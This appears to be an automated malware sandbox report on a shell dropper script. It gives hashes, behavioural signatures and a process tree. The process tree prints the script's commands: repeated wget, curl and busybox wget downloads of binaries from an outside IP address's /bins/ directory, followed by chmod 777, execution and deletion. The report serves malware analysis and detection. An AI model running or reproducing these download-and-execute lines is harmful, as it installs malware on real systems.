Analysis
max time kernel: 13s
max time network: 15s
platform: debian-9_armhf
resource: debian9-armhf-20240729-en
resource tags: arch:armhf, image:debian9-armhf-20240729-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
submitted: 25/11/2024, 02:51
Static task
static1
Behavioral task
behavioral1
Sample
aab8724f91c479bdd2a93c20e6e7d055b2c17547b8fcfe5de3bf2263eba89719.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
aab8724f91c479bdd2a93c20e6e7d055b2c17547b8fcfe5de3bf2263eba89719.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
aab8724f91c479bdd2a93c20e6e7d055b2c17547b8fcfe5de3bf2263eba89719.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
aab8724f91c479bdd2a93c20e6e7d055b2c17547b8fcfe5de3bf2263eba89719.sh
Resource
debian9-mipsel-20240611-en
General
Target: aab8724f91c479bdd2a93c20e6e7d055b2c17547b8fcfe5de3bf2263eba89719.sh
Size: 10KB
MD5: 8eccec101f87a3ed0841253c005aa97f
SHA1: 1619e034a10047b30bb121c4da04a6876dd1f076
SHA256: aab8724f91c479bdd2a93c20e6e7d055b2c17547b8fcfe5de3bf2263eba89719
SHA512: af180fba356f1d42cde849697eb3326d656c3e3cb1fee810d3bd038d24cf802ad4d93e67121dbb1cf54a49e67ea395a2cded2d2b457c496f069f7532054c9a33
SSDEEP: 96:Mk0WT740kP3wjK6sX4AcqQuUHCH2HI9H1Dzf740kP3G9mt0jUjK6swUDAAcT5HCq:Mk0WTDjK6sX4AcqQurcIUK6sJMAch
Malware Config
Signatures

File and Directory Permissions Modification 1 TTPs 8 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid  Process
780  chmod
800  chmod
806  chmod
689  chmod
703  chmod
725  chmod
750  chmod
758  chmod
Executes dropped EXE 8 IoCs
ioc                                      pid  Process
/tmp/rHUTEg2jXLiY6I08whbugWHCBkLJXiBr9B  690  rHUTEg2jXLiY6I08whbugWHCBkLJXiBr9B
/tmp/d1R2tZjac6omxkfQo9DWrwo0C1iI1soBef  704  d1R2tZjac6omxkfQo9DWrwo0C1iI1soBef
/tmp/Ca1tYwT46uqUVOyPeS6TqAjun0aJadZl1e  726  Ca1tYwT46uqUVOyPeS6TqAjun0aJadZl1e
/tmp/j6lTHvlMjxrh5xlV6KSkWFMglNiHy29iuk  751  j6lTHvlMjxrh5xlV6KSkWFMglNiHy29iuk
/tmp/bYpdcUFSB4aMHdsZalKNV4EtqlVyPQGXZo  759  bYpdcUFSB4aMHdsZalKNV4EtqlVyPQGXZo
/tmp/Er2RvXuTUt7dZZd72n9fPe7YCKcyvBOWG6  782  Er2RvXuTUt7dZZd72n9fPe7YCKcyvBOWG6
/tmp/D8JyIg64Y6Fn6N9I2xRRBRRz5gg1zld3IZ  801  D8JyIg64Y6Fn6N9I2xRRBRRz5gg1zld3IZ
/tmp/sZ5UcdMaxA1tH37XyCpQQnO7La6C0tTBsU  807  sZ5UcdMaxA1tH37XyCpQQnO7La6C0tTBsU
Checks CPU configuration 1 TTPs 8 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description              ioc            Process
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
Reads runtime system information 16 IoCs
description              ioc                             Process
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/self/auxv                 curl
File opened for reading  /proc/self/auxv                 curl
File opened for reading  /proc/self/auxv                 curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/self/auxv                 curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/self/auxv                 curl
File opened for reading  /proc/self/auxv                 curl
File opened for reading  /proc/self/auxv                 curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/self/auxv                 curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
Writes file to tmp directory 8 IoCs
Malware often drops required files in the /tmp directory.
description                   ioc                                      Process
File opened for modification  /tmp/D8JyIg64Y6Fn6N9I2xRRBRRz5gg1zld3IZ  curl
File opened for modification  /tmp/sZ5UcdMaxA1tH37XyCpQQnO7La6C0tTBsU  curl
File opened for modification  /tmp/rHUTEg2jXLiY6I08whbugWHCBkLJXiBr9B  curl
File opened for modification  /tmp/d1R2tZjac6omxkfQo9DWrwo0C1iI1soBef  curl
File opened for modification  /tmp/Ca1tYwT46uqUVOyPeS6TqAjun0aJadZl1e  curl
File opened for modification  /tmp/j6lTHvlMjxrh5xlV6KSkWFMglNiHy29iuk  curl
File opened for modification  /tmp/bYpdcUFSB4aMHdsZalKNV4EtqlVyPQGXZo  curl
File opened for modification  /tmp/Er2RvXuTUt7dZZd72n9fPe7YCKcyvBOWG6  curl
Processes
- [PID 655] /tmp/aab8724f91c479bdd2a93c20e6e7d055b2c17547b8fcfe5de3bf2263eba89719.sh: /tmp/aab8724f91c479bdd2a93c20e6e7d055b2c17547b8fcfe5de3bf2263eba89719.sh
  - [PID 657] /bin/rm: /bin/rm bins.sh
  - [PID 659] /usr/bin/wget: wget http://216.126.231.240/bins/rHUTEg2jXLiY6I08whbugWHCBkLJXiBr9B
  - [PID 678] /usr/bin/curl: curl -O http://216.126.231.240/bins/rHUTEg2jXLiY6I08whbugWHCBkLJXiBr9B
    Signatures: Checks CPU configuration, Reads runtime system information, Writes file to tmp directory
  - [PID 687] /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/rHUTEg2jXLiY6I08whbugWHCBkLJXiBr9B
  - [PID 689] /bin/chmod: chmod 777 rHUTEg2jXLiY6I08whbugWHCBkLJXiBr9B
    Signatures: File and Directory Permissions Modification
  - [PID 690] /tmp/rHUTEg2jXLiY6I08whbugWHCBkLJXiBr9B: ./rHUTEg2jXLiY6I08whbugWHCBkLJXiBr9B
    Signatures: Executes dropped EXE
  - [PID 691] /bin/rm: rm rHUTEg2jXLiY6I08whbugWHCBkLJXiBr9B
  - [PID 692] /usr/bin/wget: wget http://216.126.231.240/bins/d1R2tZjac6omxkfQo9DWrwo0C1iI1soBef
  - [PID 693] /usr/bin/curl: curl -O http://216.126.231.240/bins/d1R2tZjac6omxkfQo9DWrwo0C1iI1soBef
    Signatures: Checks CPU configuration, Reads runtime system information, Writes file to tmp directory
  - [PID 697] /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/d1R2tZjac6omxkfQo9DWrwo0C1iI1soBef
  - [PID 703] /bin/chmod: chmod 777 d1R2tZjac6omxkfQo9DWrwo0C1iI1soBef
    Signatures: File and Directory Permissions Modification
  - [PID 704] /tmp/d1R2tZjac6omxkfQo9DWrwo0C1iI1soBef: ./d1R2tZjac6omxkfQo9DWrwo0C1iI1soBef
    Signatures: Executes dropped EXE
  - [PID 705] /bin/rm: rm d1R2tZjac6omxkfQo9DWrwo0C1iI1soBef
  - [PID 706] /usr/bin/wget: wget http://216.126.231.240/bins/Ca1tYwT46uqUVOyPeS6TqAjun0aJadZl1e
  - [PID 714] /usr/bin/curl: curl -O http://216.126.231.240/bins/Ca1tYwT46uqUVOyPeS6TqAjun0aJadZl1e
    Signatures: Checks CPU configuration, Reads runtime system information, Writes file to tmp directory
  - [PID 720] /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/Ca1tYwT46uqUVOyPeS6TqAjun0aJadZl1e
  - [PID 725] /bin/chmod: chmod 777 Ca1tYwT46uqUVOyPeS6TqAjun0aJadZl1e
    Signatures: File and Directory Permissions Modification
  - [PID 726] /tmp/Ca1tYwT46uqUVOyPeS6TqAjun0aJadZl1e: ./Ca1tYwT46uqUVOyPeS6TqAjun0aJadZl1e
    Signatures: Executes dropped EXE
  - [PID 728] /bin/rm: rm Ca1tYwT46uqUVOyPeS6TqAjun0aJadZl1e
  - [PID 729] /usr/bin/wget: wget http://216.126.231.240/bins/j6lTHvlMjxrh5xlV6KSkWFMglNiHy29iuk
  - [PID 734] /usr/bin/curl: curl -O http://216.126.231.240/bins/j6lTHvlMjxrh5xlV6KSkWFMglNiHy29iuk
    Signatures: Checks CPU configuration, Reads runtime system information, Writes file to tmp directory
  - [PID 744] /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/j6lTHvlMjxrh5xlV6KSkWFMglNiHy29iuk
  - [PID 750] /bin/chmod: chmod 777 j6lTHvlMjxrh5xlV6KSkWFMglNiHy29iuk
    Signatures: File and Directory Permissions Modification
  - [PID 751] /tmp/j6lTHvlMjxrh5xlV6KSkWFMglNiHy29iuk: ./j6lTHvlMjxrh5xlV6KSkWFMglNiHy29iuk
    Signatures: Executes dropped EXE
  - [PID 753] /bin/rm: rm j6lTHvlMjxrh5xlV6KSkWFMglNiHy29iuk
  - [PID 754] /usr/bin/wget: wget http://216.126.231.240/bins/bYpdcUFSB4aMHdsZalKNV4EtqlVyPQGXZo
  - [PID 756] /usr/bin/curl: curl -O http://216.126.231.240/bins/bYpdcUFSB4aMHdsZalKNV4EtqlVyPQGXZo
    Signatures: Checks CPU configuration, Reads runtime system information, Writes file to tmp directory
  - [PID 757] /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/bYpdcUFSB4aMHdsZalKNV4EtqlVyPQGXZo
  - [PID 758] /bin/chmod: chmod 777 bYpdcUFSB4aMHdsZalKNV4EtqlVyPQGXZo
    Signatures: File and Directory Permissions Modification
  - [PID 759] /tmp/bYpdcUFSB4aMHdsZalKNV4EtqlVyPQGXZo: ./bYpdcUFSB4aMHdsZalKNV4EtqlVyPQGXZo
    Signatures: Executes dropped EXE
  - [PID 760] /bin/rm: rm bYpdcUFSB4aMHdsZalKNV4EtqlVyPQGXZo
  - [PID 763] /usr/bin/wget: wget http://216.126.231.240/bins/Er2RvXuTUt7dZZd72n9fPe7YCKcyvBOWG6
  - [PID 769] /usr/bin/curl: curl -O http://216.126.231.240/bins/Er2RvXuTUt7dZZd72n9fPe7YCKcyvBOWG6
    Signatures: Checks CPU configuration, Reads runtime system information, Writes file to tmp directory
  - [PID 775] /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/Er2RvXuTUt7dZZd72n9fPe7YCKcyvBOWG6
  - [PID 780] /bin/chmod: chmod 777 Er2RvXuTUt7dZZd72n9fPe7YCKcyvBOWG6
    Signatures: File and Directory Permissions Modification
  - [PID 782] /tmp/Er2RvXuTUt7dZZd72n9fPe7YCKcyvBOWG6: ./Er2RvXuTUt7dZZd72n9fPe7YCKcyvBOWG6
    Signatures: Executes dropped EXE
  - [PID 783] /bin/rm: rm Er2RvXuTUt7dZZd72n9fPe7YCKcyvBOWG6
  - [PID 784] /usr/bin/wget: wget http://216.126.231.240/bins/D8JyIg64Y6Fn6N9I2xRRBRRz5gg1zld3IZ
  - [PID 791] /usr/bin/curl: curl -O http://216.126.231.240/bins/D8JyIg64Y6Fn6N9I2xRRBRRz5gg1zld3IZ
    Signatures: Checks CPU configuration, Reads runtime system information, Writes file to tmp directory
  - [PID 797] /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/D8JyIg64Y6Fn6N9I2xRRBRRz5gg1zld3IZ
  - [PID 800] /bin/chmod: chmod 777 D8JyIg64Y6Fn6N9I2xRRBRRz5gg1zld3IZ
    Signatures: File and Directory Permissions Modification
  - [PID 801] /tmp/D8JyIg64Y6Fn6N9I2xRRBRRz5gg1zld3IZ: ./D8JyIg64Y6Fn6N9I2xRRBRRz5gg1zld3IZ
    Signatures: Executes dropped EXE
  - [PID 802] /bin/rm: rm D8JyIg64Y6Fn6N9I2xRRBRRz5gg1zld3IZ
  - [PID 803] /usr/bin/wget: wget http://216.126.231.240/bins/sZ5UcdMaxA1tH37XyCpQQnO7La6C0tTBsU
  - [PID 804] /usr/bin/curl: curl -O http://216.126.231.240/bins/sZ5UcdMaxA1tH37XyCpQQnO7La6C0tTBsU
    Signatures: Checks CPU configuration, Reads runtime system information, Writes file to tmp directory
  - [PID 805] /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/sZ5UcdMaxA1tH37XyCpQQnO7La6C0tTBsU
  - [PID 806] /bin/chmod: chmod 777 sZ5UcdMaxA1tH37XyCpQQnO7La6C0tTBsU
    Signatures: File and Directory Permissions Modification
  - [PID 807] /tmp/sZ5UcdMaxA1tH37XyCpQQnO7La6C0tTBsU: ./sZ5UcdMaxA1tH37XyCpQQnO7La6C0tTBsU
    Signatures: Executes dropped EXE
  - [PID 808] /bin/rm: rm sZ5UcdMaxA1tH37XyCpQQnO7La6C0tTBsU
  - [PID 809] /usr/bin/wget: wget http://216.126.231.240/bins/CJOTYBy2p2114IdSRp1PsHiSXJ7JSPXB4Z
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 153B
  MD5: 998368d7c95ea4293237f2320546e440
  SHA1: 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
  SHA256: 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
  SHA512: 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97